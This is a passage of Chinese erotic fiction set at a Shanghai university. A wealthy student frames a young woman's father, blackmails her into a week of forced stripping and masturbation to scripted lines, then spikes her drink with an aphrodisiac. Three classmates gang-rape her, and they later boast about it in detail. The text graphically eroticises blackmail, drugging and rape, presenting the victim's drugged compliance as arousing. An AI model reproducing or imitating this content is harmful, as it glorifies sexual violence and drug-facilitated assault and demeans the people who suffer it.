      “不過這次她還是被江先生你的機智挫敗了,你讓我很滿意,你要什么我都會給你的,你要多少錢?”山本問。

      “山本先生,我不要錢,我有個請求,不過可能山本先生……”江龍故作猶

      “你說吧,我一定做到?!鄙奖拘Φ?。

      “山本先生的令尊是日本昌永財團的董事長吧?”江龍問。

      “沒錯!”王先生道。

      “我想請你除掉一個人,就是你們昌永財團的上海中方總經理梁益民!”江龍道。

      “噢,那家伙,我也不喜歡,他總是維護本地的職員的利益,不過不知他和江先生有什么冤仇?”山本問。

      “我和他倒沒有冤仇,不過我和他女兒卻頗有些過節?!苯埖?。

      “他女兒?”山本會心地一笑︰“我倒是聽說他有一個如花似玉的女兒……嘿嘿,好像還曾給我們公司做過廣告少女吧?”

      “沒錯,他拍廣告時十八歲,現在應該有二十一了吧,”王王先生附和道︰“應該更加嫵媚了!”

      江龍訕笑著點頭。

      “好,我答應你!”山本道。

      “多謝山本先生!”

      三個男人在地下室爆發出心的笑聲。

      第六回 梁婉儀低下高傲的頭顱

      秋風蕭瑟。

      在上海第二大學的校園小徑里,匆匆走著一個穿短裙的美麗修長的少女。她純美的臉上帶著無盡的哀愁。她就是上二大四大美少女之一的梁婉儀。

      過路的男生留戀地回望她俏麗的背影,然后低頭議論︰“喂,你們知道嗎,她爸被公安局抓起來了,聽說是貪污,還是日本公司內部的人告發的呢!”

      梁婉儀昨天剛去拘留所探望過已經五十出頭的父親。受了沉重打擊的父親就像變了個人,幾乎有些癡呆了,只是一個勁說自己是冤枉的。這景像令梁婉儀潸然淚下。

      梁婉儀走出校園,走進了學校旁邊一幢豪華的高層住宅樓里。她乘電梯到了二十一樓,來到2101房間門口。她猶豫了一下,想轉身離去,可是眼前又浮現出了父親年邁憔悴的面容。她深吸了一口氣,像是下了決心,按響了門鈴。

      門開了,她看見了令她心的江龍的臉。

      “梁小姐終于來了,讓我好等?!苯堁陲棽蛔∠矏倢⒘和駜x讓進屋里。

      “很高興梁小姐按我說的穿了那么性感的衣服?!苯垵M意地看著穿著短裙美腿畢現的梁婉儀。梁婉儀一言不發,卻依然保持著她那高傲的神情。

      “那么我其他的要求,梁小姐考慮得怎么樣了?”

      梁婉儀跟著江龍走進他的臥室里,她咬著嘴唇,明顯帶著無比的屈辱,輕輕點點頭。

      江龍得意地看著梁婉儀的樣子。她點頭的時候是那么的羞澀,那么的無可奈何。對于一個像梁婉儀那么高傲的少女來說,這樣的表情絕對給人帶來滿足感。

      “咦,梁小姐怎么這會兒這么羞澀啦!那天打我的時候的高傲的表情到哪里去啦?”江龍故意問道。

      梁婉儀已經做好了被江龍羞辱的準備,她雖然羞憤,卻只有默不作聲。

      “梁小姐,你已知道令尊是我一手陷害的嘍?他現在在監獄里過得怎么樣?唉,這么把年紀的人了……”

      梁婉儀仍不語。

      “唉,他一定因為被人陷害而憤憤不平吧?要是他知道他的如花似玉的寶貝女兒現在竟然馬上就要被陷害他的人玩弄,不知是什么心情?”江龍惡笑著說。

      “你是畜生!”梁婉儀終于忍不住嬌叱。

      “嗯,和我搞肖揚的時候她罵得一樣,不知梁小姐的玉體和肖揚小姐比哪個更撩人呀?這世上目前大概也只有我有機會做個比較了吧?”

      “你不會有好結果的!”梁婉儀強忍住屈辱的淚水,咬著嘴唇罵道。

      “梁小姐,根據我們的約定,你好像不應該這么跟我說話的,是不是?”江龍得意地說︰“如果你真想救你的老父親的話?!?br>
      梁婉儀再次深深吸了口氣,她知道,無論江龍怎么羞辱她,她只有忍受,為了可憐的父親。于是她咬緊嘴唇,下了最后的決心,道︰“只許你……看我,不許碰我……你敢碰我一下,我……殺了你?!?br>
      “哈哈哈哈!”江龍笑道︰“梁小姐放心,我會遵守我的諾言,只不過也請梁小姐也要按我的要求說話和行動哦!我要求你說的那些話你都記熟了嗎?”

      “記……記熟了!”梁婉儀輕聲說。江龍看著梁婉儀這種明明正受著污辱卻仍然竭力保持高傲的樣子感到無比滿足。

      “很好!”江龍滿意地道︰“那么梁小姐,你被一個陷害你父親的人玩弄,你是什么感覺???”

      梁婉儀閉上美目,羞澀地輕輕道︰“我……很喜歡!”梁婉儀說完這話,立刻羞憤欲死。應該說,讓她這么高傲的少女說出這么樣的話比死還難受。

      “是嗎?”江龍故做驚訝狀,道︰“又美麗又高傲的梁婉儀小姐竟然喜歡被我玩弄?”

      “是的,我喜歡讓你……讓你……讓你……搞我?!绷和駜x竭力克制羞憤說了出來︰“因為……其實……我一直暗暗喜歡你?!绷和駜x說完這句,羞得滿臉通紅,就好像已經在江龍面前赤身裸體了一樣。

      像她這樣的少女,從十幾歲起,就一直被周圍的男孩子當成公主,能被她多看一眼也是榮幸,而她從來就不屑于對哪個男孩子表示好感,可是此刻卻讓她屈尊對一個男孩說出示愛的話,這簡直太羞辱了。

      江龍享受著這一切。他慶幸自己做了一個極端正確的決定。在梁婉儀來找他談救她父親的條件時,開始他極力要求梁婉儀答應同他性交。這也很自然,因為能夠同梁婉儀這個大美女性交恐怕是每個男人的欲望??墒橇和駜x死都不肯,江龍看出梁婉儀怎么都不會讓他蹂躪她的貞操,因此采取了別的策略。他便同意不碰梁婉儀的身體,但梁婉儀必須依照他的要求做任何動作,包括脫光衣褲,還必須按照他的要求說他為她編好的臺詞,期限是一個禮拜。

      梁婉儀最初也堅決不肯脫衣服,可是她其實也明白,如果不讓這個惡少大大地占一下自己的便宜的話,他說什么也不會答應放過她父親的。所以最后為了她父親她只有屈辱地答應了江龍的要求。兩天后,江龍給了她他寫好的第一天的臺詞。梁婉儀這才發現,其實讓她說那些羞澀的話似乎和讓她脫衣服同樣地難以忍受。

      而江龍雖然暫時失去了給這個美少女破身的好機會,但是他今天發現,污辱梁婉儀這樣一個的高傲少女,慢慢污辱她的自尊,享受她的屈辱,她的羞澀,她的憤怒卻又無可奈何的樣子也許比把她按在床上,扒開兩腿,捅她的小洞來得更加有滿足感。最重要的是,要干她遲早都有機會,最后不行甚至可以強奸她,反正他在公安局也有關系。但是這樣的羞辱卻非得要她自才行,所以必須利用這個千載難逢的脅迫她的機會。

      “是嗎?你不是一個十分高傲的女孩子嗎,也會暗暗喜歡別人嗎?”江龍坐到沙發上翹起二郎腿,看著婷婷站著的梁婉儀。她羞澀的面容還真像個在心上人面前表白的情竇初開的少女。

      “我是很高傲,可是因為你……實在太有魅力,讓我……情不自禁喜歡上了你。再高傲的女孩子也會被……征服的?!?br>
      “那你為什么派人打我???”

      “是……是因為我暗戀你,你卻……總是不理我……”

      “這么說,你處處同我作對,原來是由愛生恨嘍?”

      “不是,我一直……一直……愛你的?!绷和駜x只感到無盡的羞恥感向她襲來,可是她卻一點辦法也沒有。

      “是嗎?那我強奸了你的好朋友肖揚,你也不恨我?”

      聽了這話,梁婉儀羞憤難當,站在那里臉漲得通紅。

      “怎么了,想前功盡棄?”江龍冷冷道。

      “是?!绷和駜x終于屈服︰“我……不恨你。實際上……我很妒忌肖揚……因為……你……你……摸過她的……她的……”梁婉儀實在難以啟齒。

      江龍滿足地欣賞著梁婉儀的羞辱樣。

      梁婉儀深吸一口氣,終于說︰“因為你摸過她的……奶頭,還插入了她……她的……陰道。我多想你能夠……能夠……畜生!江龍你是畜生!我說不出口,我說不出??!”梁婉儀終于忍不住,淚水奪眶而出。

      “果然是個高傲的小姐,這么點污辱就受不了了,唉,你可憐的老爸不知現在在遭什么罪???”江龍道。梁婉儀站在那里,哭得花枝亂顫。聽到江龍再次的威脅,梁婉儀只有再次鼓起勇氣,收住淚水。

      “我多想你像搞肖揚那樣的……搞我啊?!绷和駜x顫聲說。

      “怎么搞?說具體點!”江龍不耐煩地道。

      “就是……就是摸我的奶頭、插我的陰道!……畜生,你太過份了!你太過份了!”梁婉儀怒叱。

      “哈哈哈哈!”江龍仰天大笑。太讓他滿足了!上二大最美麗高傲的少女梁婉儀竟然站在他的面前談論她自己的奶頭和陰道,這恐怕是上二大所有男生做夢也不敢想的事吧!

      “你這么愛我,為什么不來向我表白呢?”江龍又問。

      “因為……我放不下高傲小姐的架子?!?br>
      “那,我不理你,你是不是很痛苦???”

      “是,我……每日每夜都思念你?!?br>
      “怎么思念???”

      “我每天都盼望著看到你,你出現在我面前的時候我都會心跳加速。見不到你的時候我會偷偷……偷偷……我說不出口,我說不出口!”梁婉儀羞憤至極,眼淚又要流出來。

      “我最后一次警告你,如果你再不按照我們約定的做,你父親就會在監獄里安渡晚年了!”江龍威脅道。

      梁婉儀無比后悔當初的決定,以為這樣可以保持貞潔,最多口頭上讓江龍羞辱,現在她發現,這口頭的羞辱根本就是羞辱她的尊嚴,肖揚是在肉體上被他奸淫,而她是在尊嚴上被他奸淫。是的,她說這些羞辱的話根本就是等同與被江龍奸污!她太讓這個惡少得意了!可是現在一切已經晚了,她只有拋棄所有的自尊與驕傲,去滿足眼前這個惡少,換取父親的自由。

      梁婉儀猶豫了片刻接著說道︰“見不到你的時候,我……我偷偷……偷偷地……手淫!”梁婉儀費了極大的努力才說出這兩個字。

      “真的嗎?原來外表那么高傲的梁婉儀小姐也手淫?”江龍笑道。

      “是的,別看我高傲,但一想到你……就忍不住想……手淫?!?br>
      “很好,很好!”江龍拍手道︰“那么我倒很好奇高傲的梁小姐是怎么手淫的,請你表演一下吧!”

      “不行!決不可以!”梁婉儀道。

      “別忘記了我們的約定,你必須做任何我要你做的動作!”江龍道。

      梁婉儀后悔自己當初考慮太少,以為不讓江龍碰自己就可以了,沒想到江龍會有這么下流的要求。為了救父親只有這么做,可是這怎么可以呢!當著這個惡少的面手淫,這太屈辱,太讓他滿足了!

      “反正選擇權在你!”江龍翹著二郎腿道。他知道,現在他是完全占據了上風。

      梁婉儀站在那里,絕望地進行著思想斗爭。最后可憐的父親憔悴的面孔再度浮現在她的腦海里,救父親的責任和望終于戰勝了羞恥感。

      “我……我是這樣手淫的……”梁婉儀伸出白晰的手,放到了自己的胸部。江龍滿意地看著這難得的一幕。

      “我一邊幻想著你,一邊用手撫摸我的……我的乳房?!绷和駜x說著開始用手隔著衣服摸弄自己的胸部。

      “江龍,我愛你,我愛你……”梁婉儀一邊喃喃地說著一邊將一只手伸進衣服里去摸弄乳房,另一只手則向下伸進短裙里,撥開三角褲,撫摸自己的陰戶。

      “嗯,挺熟練的嘛!”江龍笑說。

      “因為我為了你已經手淫了無數次了,其實……其實那天你和李浩比賽籃球時……我看見你的……英姿……就忍不住躲在人群里像現在這樣……手淫。??!江龍,你太帥了!你太英俊了!你太健美了!??!我愛你!我愛你!”

      天??!這是怎樣的景像??!任何一個正直的人看見了都會心痛不已的??!

      “很好!不過那天因為有人,所以你只有這樣手淫,今天就我們倆,你就可以脫得光光地手淫了,是不是,也可以讓你的心上人我仔細欣賞欣賞。如果你手淫得好,說不定我會接受你的愛呢!”

      終于要裸體了!梁婉儀雖然早有思想準備,可是讓她這個高傲而且自從發育以后就從來沒有在任何男性面前裸露過的玉體的少女裸露,實在需要太大的勇氣了。

      “拋棄你的自尊吧!”江龍得意地說︰“你們斗不過我的,在我面前,你已經不再是那個萬人迷戀的富家小姐了,你是被我征服的無數女孩的一個而已,懂嗎?你是被征服者,沒有什么尊嚴、驕傲!”

      梁婉儀羞憤得滿臉通紅,可是她卻無法反駁江龍的話,就算正義終有伸張的那天,也決不是現在!現在,她沒有選擇。

      于是梁婉儀緩緩道︰“是,其實我一直盼望有這么個機會脫得光光地在你面前手淫!今天終于有機會了,我好高興??!我一定好好手淫給你看!我知道,像你這樣英俊瀟灑的男孩子,對女孩子要求一定很高??墒俏译m然很平凡,卻還是有幾分姿色的,身材也還可以,只是你沒有機會看到,所以才會對我不理不睬,求你給我個機會展示我的裸體給你看吧!”天??!上二大最高傲的少女梁婉儀竟然求人讓她裸體??!

      “嗯,好吧,既然你這么想要,就脫光了給我看看吧!”江龍說完自己都有些得意,仿佛梁婉儀真的是愛死他似的。

      梁婉儀緩緩地、優雅地伸出手,脫去了上衣和內衣,里面是白色的縷花邊胸罩,接著,緩緩褪去了短裙。這樣上二大的美女梁婉儀就只剩下了白色的內褲和胸罩了。

      “你看,我的腿是不是很美?”

      “嗯,一般?!苯堁b腔做勢地說。什么一般!這明明是一雙潔白修長勻稱的美腿,整個上二大大概也找不出更完美的腿來??蓱z梁婉儀從小就被異性的贊譽所包圍,今天低聲下氣地求別人看自己的玉體,竟然還被別人這樣不屑!她的自尊受到極度的打擊。而這正是江龍的目的,其實他早已經對梁婉儀完美的身材驚嘆不已了。江龍自從初二玩弄了第一個少女,他班上那個神氣高傲又美麗的班長后,玩弄的少女不下一百個,而像梁婉儀這樣的,絕對是極品中的極品。

      “那我的……乳房發育得挺好的?!绷和駜x說著將手伸到背后,解開胸罩扣子,脫去了胸罩。一對潔白高聳的乳房裸露了出來,第一次展現在一個男生的面前。梁婉儀羞澀得閉上了美目。

      終于讓這個惡少得逞了,終于讓他觀賞自己的玉體了!

      “嗯,太小了點!”江龍又說,其實梁婉儀的乳房同她1米69的身材配合得天衣無縫,根本是很完美的尺寸。

      梁婉儀漲紅了臉,伸手撫弄她的粉紅色的乳頭︰“我就是這么手淫的,??!江龍!我愛你!”

      這撩人的景像幾乎讓江龍無法控制,但是他還是克制住了自己。梁婉儀撫弄了一會兒她的乳房,然后伸手去脫她的小巧的內褲。內褲沿著勻稱的大腿,曲線優美的小腿,小巧的腳踝緩緩脫去,梁婉儀姿態優雅地分別翹一翹她的兩只腳,脫去內褲,也脫去了精美的涼鞋。

      此時,上二大四大美女之一的梁婉儀終于在江龍面前一絲不掛了。

      梁婉儀婷婷地站在那里,任由江龍肆意觀賞,觀賞她的美乳、玉腿,和下腹淡黑色的陰毛。

      “江龍,你看我美不美?”梁婉儀用討好的語調說,然后微微掰開她的腿,將手伸進胯間,摸弄陰戶。

      江龍看得欲火中燒,他強忍住欲火,道︰“我看不清楚,你躺到地下,分開腿?!?br>
      梁婉儀滿腔羞憤,卻還是順從地躺下,緩緩地分開兩條長腿。她那神圣的少女羞處,終于毫無保留地開啟在江龍的面前!梁婉儀的淚水終于再次流了出來。

      “哈哈哈哈……哈哈哈哈!”江龍滿足的笑聲回蕩在房間里。

      梁婉儀伸出纖長的手指,撥開她那粉紅的肉縫,一邊逗弄自己那顆陰蒂。

      “江龍!??!??!我愛你!我渴望被你征服!我渴望成為你的女奴,伺候你!??!江龍!求你接受我的愛吧!”梁婉儀屈辱地說著。

      “別傻了,你實在太難看了,身材也太一般!”江龍強忍欲火,說道。

      “噢不!江龍!求你了!”梁婉儀說著起來跪倒在江龍的身前︰“求求你,求求你……”

      “哈哈哈哈……哈哈哈哈……”江龍發出無比滿足的狂笑。

      梁婉儀痛苦地跪在地上,低著她高傲的頭顱。天!這樣的羞辱要持續一個禮拜!

      第七回 看到自己心中的女神被玩弄

      嘈雜的男生寢室,晚上熄燈前。

      陳卓開門走進自己的寢室,里面有三個男生正在興奮地聊著什么,他們是他的同在新聞系三年級的同學“傻胖子”、“阿流”和“宋狗”。三個人是系里出了名的混日子的人,大多數人只知他們的綽號,甚至忘了他們的真實姓名。陳卓對他們有說不出的討厭。三人看見陳卓進來便停止了說話。

      大家各自洗臉刷牙,很快便熄燈。

      這一晚不知怎么,陳卓失眠了,翻來覆去睡不著。大約過了一點,他聽到阿流他們三人又開始講話。

      “你們猜我昨天在放映廳偷看到江龍搞誰?”阿流極興奮地說。

      “誰?”另兩人忙問。

      陳卓便知道阿流又在夸耀他的無恥勾當。阿流原來是學生中心放映廳的放映員,經常利用那里同人看黃色錄像、鬼混。自從江龍來了以后,利用自己的權勢霸占了放映廳。阿流雖然氣憤,卻也高興,因為江龍經常在那里玩弄學校里或校外的美女,他便經常躲到放映室隔壁的機房里偷窺,過干癮。

      陳卓覺得心,但是他睡不著,而他們三人的聲音雖然低,卻還是清晰地傳到他耳朵里。

      “梁.婉.儀!”阿流一個字一個字地說。

      “什么,梁婉儀!”傻胖子大叫︰“不可能吧?”

      “那么高傲的女孩子江龍也泡得到?”宋狗說。

      陳卓的心情可想而知,這三個猥瑣的混蛋說說別的女孩滿足一下自己的變態欲望也就算了,居然這次污辱他心中如女神般的梁婉儀!他攥緊拳頭幾乎想蹦起來揍胡說八道的阿流。但身為學生干部的他終于克制住。

      “騙你們不是人,”阿流道︰“他們明晚約好還是在那里?!?br>
      “我也要看,我也要看!”傻胖子和宋狗大叫。

      “給我五十塊,我帶你們去!”阿流說。

      “太多了吧!”

      “詐自己兄弟的錢!”

      三人討價還價,兩人終于答應付給阿流一共八十塊。

      陳卓當然認為傻胖子和宋狗是給阿流騙了錢了。梁婉儀會和江龍約會?這簡直是太陽從西邊出來!但陳卓是聰明的人,心中還是有點疑問。

      首先,阿流他們三個雖然平時就嘴里對梁婉儀不干不凈,常一起幻想著奸污她,但這次阿流似乎沒必要編造一個江龍玩弄梁婉儀的故事,因為編造這個一點快感也沒有。至于騙錢,三個人是死黨,又住一起,抬頭不見低頭見,阿流沒有這么傻吧?但是陳卓又無論如何不會相信梁婉儀真的會同江龍約會!他連想都不想。

      但不知為什么,盡管他拚命跟自己說別信阿流那種小流氓的胡說,他還是不斷地想這件事。竟然一個晚上都沒有睡著。

      第二天晚上九點,盡管陳卓對自己說了一千遍沒有必要,他還是鬼使神差地上了活動中心7樓。他是學生會干部,有放映廳隔壁社團部辦公室的鑰匙?,F在錄像已經散場,整個7樓都沒有人。陳卓開門進了辦公室,他沒有開燈。不一會兒,他聽到走廊上傳來腳步聲,然后是說話聲,然后是開機房門的聲音。他聽出是阿流他們。

      不一會兒,走廊上又響起了腳步聲,腳步聲進入了隔壁的放映室,然后燈亮了。陳卓果然看見了江龍。

      十平米左右的放映控制室左右各有一扇窗子,一邊是機房,也就是阿流他們藏身的地方,一邊是社團辦公室,也就是陳卓所在的地方。當放映室亮燈而另外兩邊不亮的時候,江龍根本無法看見兩邊房間的情況,何況,江龍根本沒想到現在那里會有人。

      陳卓狠狠地盯著坐在放映室里悠閑的江龍。江龍確實高大英俊,難道他心中清純的美少女梁婉儀,真的被蒙蔽了眼睛而甘心投入這個花花公子的懷中?不會的,不會的。陳卓反復告訴自己,梁婉儀那么高傲,才看不上江龍呢!可是如果不是約會,江龍來這里干什么?是了,是同別的女孩子約會。阿流看錯了,阿流在胡說!對,一定是這樣!

      江龍拿出兩罐飲料,打開,在其中的一罐里撒入了一些黃色的藥粉。然后繼續悠閑地坐著。陳卓則依然在那里忐忑,腦海里出現了梁婉儀高傲美麗的神情。啊,女神!

      就在這時,有敲門聲。江龍臉上露出了微笑,他去開門。走進來一個修長的少女。

      陳卓只感到頭“嗡”地一聲。走進來的這個少女,穿著淺藍色的連衣短裙和肉色長絲襪,露出無與倫比的美腿,長發飄逸,似乎隔墻也能聞到。她,不是他心目中的女神梁婉儀又是誰!

      天啊,她真的跑到這里來見江龍。瞧她的樣子,明顯是精心打扮過的!不,她來這里不一定是來同江龍約會的,她只不過找他有事。到了這個地步,陳卓依然想出理由來欺騙自己,因為他實在不相信梁婉儀成為江龍的玩物。

      “你終于來了?!苯埞首骼涞卣f。

      “龍,我好想你呀!我一直盼著來見你呢!”這是梁婉儀同江龍約定的最后的一天。已經被迫說了六天那么羞恥的話的梁婉儀,此刻已經能很自然地說出這些令江龍滿足的話了。

      可是旁邊偷看的陳卓卻痛苦地驚呆了。原來都是真的,阿流講的都是真的!唉,沒想到連梁婉儀這樣高傲的少女也會被江龍外表的英俊瀟灑所迷惑,他明明是個紈子弟??!

      “龍,你看我今天漂不漂亮???”梁婉儀優雅地扭動一下身軀,令陳卓心中一蕩。

      “很一般嘛,這個樣子你怎么指望讓我接受你的求愛呢!”江龍裝作不耐煩地說。

      “可是,龍,我的生命中不能沒有你??!”梁婉儀哀求地說。

      什么!陳卓簡直不相信自己的耳朵。江龍啊,江龍,你是人嗎!這么漂亮的少女向你求愛,你是多大的福氣??!可是你居然不接受!簡直是混蛋??!陳卓心中替梁婉儀惋惜。為什么低聲下氣地求這種人愛你??!

      “龍,那天你說我的乳房不夠大,我這兩天……一直自己撫摸自己的……乳房,你看是不是大了一點?”梁婉儀說。

      什么,梁婉儀居然為了這個惡少每天撫摸自己的乳房,這景像……陳卓不覺下面硬了起來。

      “大什么大呀!我才不要看呢”江龍輕蔑地說。

      “龍,那到底要我怎樣你才肯接受我的愛呢?”梁婉儀哀求。

      “這樣吧,”江龍冷笑著拿起桌上的一支圓珠筆︰“你把它塞進自己的屁眼里,我就接受你的愛?!?br>
      陳卓氣得簡直想破窗而入揍江龍。如果他不喜歡梁婉儀也就算了,怎么可以這么羞辱一個高傲的女孩呢!

      梁婉儀猶豫一番終于說︰“這是你最后的要求嗎?”

      “是的,”江龍道︰“我已經玩夠了?!?br>
      “好,我插?!绷和駜x說。

      不!不要!陳卓心中吶喊。

      梁婉儀從江龍手中接過了圓珠筆,撩起自己的短裙……陳卓一下子勃起到極點。此時他的心中無比矛盾,又不想讓婉儀這么做,讓江龍羞辱,卻又想看一看自己朝思暮想的夢中情人的屁股。

      梁婉儀緩緩將自己的白色內褲沿著光滑的大腿脫到膝蓋,由于仍舊有短裙垂下來遮掩,陳卓只能若隱若現地看見梁婉儀下腹的陰毛和翹翹的屁股,但是這足以讓他血脈賁張了!天啊,江龍一定早看過了,一定全看過了!他嫉妒地想。

      梁婉儀將手從后面伸進短裙,陳卓看不到她具體的動作,只看到她美麗的臉皺起了眉頭。過了一會兒,她說︰“我……插好了?!?br>
      “翹起來讓我看看!”江龍冷冷說。

      梁婉儀順從地轉過身,跪下,然后高高翹起屁股,短裙向腰間滑落……梁婉儀豐滿雪白的臀部完全露了出來,在那兩片肥白的屁股中間的溝里,插著一支圓珠筆!

      陳卓感到嘴唇一熱,發現自己鼻血噴了出來。這一幕太撩人了!

      可惜他在側面,無法看清楚梁婉儀的菊花蕾和那條肉縫??墒墙埧匆娏?,他看得清清楚楚!陳卓嫉妒得發狂!

      這時江龍伸手握住圓珠筆,往梁婉儀屁眼里狠狠一插。

      “??!”梁婉儀慘叫一聲跳起來。

      “不許碰我!”梁婉儀道。

      “我沒有碰到你,我碰的是圓珠筆?!苯埿χf︰“我沒有違反規定?!?br>
      “好,你羞辱夠了,”梁婉儀從屁眼里拔出筆,拉起內褲說︰“什么時候放了我父親!”

      原來如此!陳卓恍然大悟。梁婉儀原來是受了江龍的脅迫的。本來嘛,她怎么可能喜歡江龍呢!陳卓如釋重負,卻又為梁婉儀在江龍面前露屁股而心痛。不過從他們的對話里可以知道,梁婉儀沒有讓江龍碰過她,她還是純潔的,這樣一想陳卓又好受了一些。

      “別急嘛,喝點水?!苯垖⒆郎系娘嬃线f過去。

      梁婉儀喝下,七天的羞辱讓她習慣了對江龍的順從。

      江龍用難以察覺的微笑看著梁婉儀將飲料喝下,說︰“你隨時可以去接你的父親,我會安排的,三天以后你去找刑偵科的沈科長吧!”

      梁婉儀點點頭。

      江龍倒還守信,陳卓心道。只要婉儀父親獲救,他就不能再要挾婉儀了??祀x開這里吧,婉儀。陳卓心道。

      可是梁婉儀卻仍然站在那里。美麗的小臉似乎變得越來越紅,她的眼光也有些迷離起來。

      “好……好熱啊?!绷和駜x有些迷糊地說。

      陳卓大驚,想起剛才看見江龍往飲料里撒藥粉,一定是春藥!這畜生怎么肯不碰婉儀的身體呢!

      “熱就把衣服脫了吧!”江龍微笑說。

      “這……怎么……可以呢!”梁婉儀越來越迷糊地說︰“熱死了啦!”

      怎么辦?眼看被春藥迷惑的梁婉儀就要任由江龍的擺布。陳卓想︰如果沖進去,江龍會大怒,萬一他不肯放婉儀的父親怎么辦?對了!陳卓靈機一動。

      他走出辦公室,故意用很重的腳步走到放映室門口,敲門。

      “江龍在嗎?”他說。

      過了一會兒,一臉不滿的江龍將門開了一條縫︰“是你,什么事?”

      “噢,你真的在這,嗯……林老師……召集我們開會……討論晚會的事?!标愖空f。

      “現在?這么晚?”江龍極不耐煩地問。

      “嗯,對,很緊急?!?br>
      “嗯,好吧?!苯垷o可奈何,閃身出來,鎖上門。

      “走吧?!?br>
      陳卓沒想到這么順利,便同江龍一起乘電梯到了一樓。

      “在哪里?”江龍問。

      “在……文科樓……林老師的辦公室?!标愖亢f一個地方。

      “那走吧?!苯堈f。

      陳卓一邊走一邊盤算下一步怎么辦。文科樓很遠,兩人默默地走了約十五分鐘路。

      “下一步怎么辦?”江龍打破沉默。

      “什么下一步怎么辦?”陳卓不解。

      “我問你呀,等我們到了文科樓看不到林老師,你怎么解釋,想好了嗎?”江龍冷笑著問。

      “這個……”

      “怎么樣,好看嗎?”

      “什么……好看嗎?”陳卓尷尬無比。

      “裝什么傻,我問你梁婉儀的屁股好看嗎?”江龍道︰“我知道你一直在偷看,怎么樣,梁婉儀應該是你的暗戀對像吧?”

      被江龍全部說中心事,陳卓尷尬無比,漲紅了臉。

      “江龍,你太卑鄙了,利用婉儀對她父親的愛,占她的便宜!你是混蛋?!?br>
      “我當然是混蛋了,”江龍笑說︰“不過當個可以看上二大最美的美女的屁股的混蛋總比當個只能暗戀她的傻瓜好!”

      “我是喜歡婉儀,可我不是傻瓜?!标愖苛x正詞嚴地道︰“我一定會讓你這個混蛋得到應有的下場的!”

      “你還不是傻瓜嗎?”江龍哈哈大笑︰“你想想,我既然知道你的目的,為什么這么乖地跟你出來?”

      “這個……”

      “今天來偷窺的不止你一個吧?”江龍說。

      陳卓頓時感到五雷轟頂。

      “那三個小流氓里面的阿流他曾經在放映廳做過事,他當然有放映室的鑰匙了。我給梁婉儀服的春藥呢,是最先進的,再高傲保守的女孩子,也會變成淫娃蕩婦……”

      “??!”陳卓大叫一聲轉身就狂奔。

      “傻瓜!”江龍得意地在陳卓背后大叫。

      天??!陳卓心急如焚,他和江龍走了有一刻鐘,又講了十分鐘話,他跑回去也要五分鐘。天??!半個小時里,被春藥迷惑了心志的梁婉儀同阿流他們三個流氓在一起,會發生什么?陳卓簡直不敢想。

      他奔進中心。電梯,電梯,快呀,快!他沖進7樓的走廊。放映室關著,他不顧一切地一腳踢開門。里面什么人也沒有!

      無數可能性在陳卓腦海里掠過。

      婉儀她……一定回寢室了,對她回寢室了,她沒事的。陳卓安慰自己,他在中心每個角落都找了一邊,又在學校里跑了一圈,什么也沒有發現。他去到梁婉儀的寢室樓前,時間太晚阿姨已經不肯傳呼。他感到自己要發瘋了,這半個多小時里到底發生了什么?


      十二點,寢室關門的最晚時間,陳卓筋疲力盡地回到寢室里。阿流、傻胖子和宋狗已經都在寢室里。

      陳卓裝作若無其事,卻忍不住偷偷地觀察他們三人的表情,他越看越感到難受,因為那三個小流氓的臉上有著明顯的掩飾不住地帶著興奮。似乎在陳卓進來之前,他們正在熱烈地交流些什么。

      不會的!陳卓還是拚命讓自己相信。梁婉儀一定是自己回去了,那三個混蛋興奮只是因為看見了梁婉儀翹起屁股時的綽約風姿!對,一定是這樣,梁婉儀怎會讓他們這三個流氓占便宜呢?不會的,決不會的!梁婉儀這樣的高傲少女一定能戰勝春藥,保持清醒的!對了,梁婉儀這么神圣不可侵犯,三個小流氓哪里敢碰她。陳卓編織著千萬個理由。

      十二點準時熄燈。陳卓當然翻來覆去睡不著,他故意不睡,因為他想聽他們三人的夜談,當然,他裝出呼吸均勻的樣子。到了大約一點鐘,傻胖子終于開始輕聲說話。

      “陳卓應該睡著了吧?”

      “肯定睡著了!”宋狗道。

      “不管怎樣,說輕點!”阿流道。

      陳卓當然繼續裝睡,聽他們說什么。他心中涌起極度的緊張,就像在等待一場審判的結果。

      “你們說,要是陳卓知道今天的事,會怎么樣?”傻胖子笑說。

      “肯定瘋了!自己暗戀已久的夢中情人竟然心甘情地讓他最瞧不起的三個人給玩了,他當然會發瘋的!”宋狗說。

      “最有趣的是,這個機會還是他給我們創造的!”阿流道。

      三人同時輕笑。

      “阿流啊,阿流,你可是破了我們學校最美的美女的處女之身??!”傻胖子說。

      “媽的,你不是后來也插了嗎?”阿流說道︰“第一次緊得要命,有什么好的?”

      “緊才爽嘛!”宋狗說。

      陳卓睡在那里只感到一把尖刀插進了心臟!他一直擔憂的事情終于被證明發生了,他的所有的自欺欺人再也沒有用了!梁婉儀,他認為世界上最純潔,最美麗的少女,剛才在放映室里被如此猥瑣的三個混蛋輪奸了。而最令陳卓痛心的是宋狗說的“心甘情”四個字!冰清玉潔的梁婉儀不光是被他們輪奸了,還是在春藥的作用下心甘情愿的!也就是說,當阿流或是傻胖子干梁婉儀的時候,她還是很有快感地配合他們!那會是怎樣的景像??!陳卓實在不敢想像。

      “我還真希望讓陳卓知道,氣死他,誰叫他那么看不起我們!”宋狗說。

      “對,要是他知道他的夢中情人被我撩起短裙摸屁股時還對我嬌嗔‘討厭,不要啦!’的話,他肯定嫉妒得發狂?!鄙蹬肿诱f。

      天,梁婉儀果然迷失了自己!陳卓雖然心痛,可是聽到傻胖子說摸梁婉儀屁股時,竟然下面硬了起來!他暗罵自己沒用,竟然在幾個自己看不起的混蛋談論怎么玩弄自己夢中情人時勃起!可是陳卓無法遏制自己,他甚至希望他們再多說點,說得越詳細越好!

      “她的胸罩真好看!”宋狗說︰“結果他媽的被你扯壞了!”

      “我解不開嘛!”傻胖子說。

      “笨蛋,那種是無帶的胸罩!”阿流說。

      “阿流,你說是梁婉儀的大腿好看還是肖揚的好看,她們的腿都好長哦!”宋狗。

      “他媽的,我又沒把肖揚脫了褲子看過,怎么知道!”

      “我喜歡腿長的女孩穿長絲襪,太性感了!”傻胖子。

      “我同意!”宋狗。

      “那為什么你還是把她的絲襪脫了?”

      “那當然有意義了,這叫一絲不掛!你懂嗎,只有這樣,我們才可以自豪地宣稱,上二大四大美女之一的梁婉儀在我們面前一絲不掛過!”

      “一絲不掛算什么,不是連她的小洞洞也讓我們插過了嗎!連江龍都沒插過哩!”

      “真是做夢都沒想到??!”

      “對了死胖子,你也太不懂憐香惜玉了!”宋狗。

      “你是說……”

      三人淫笑。

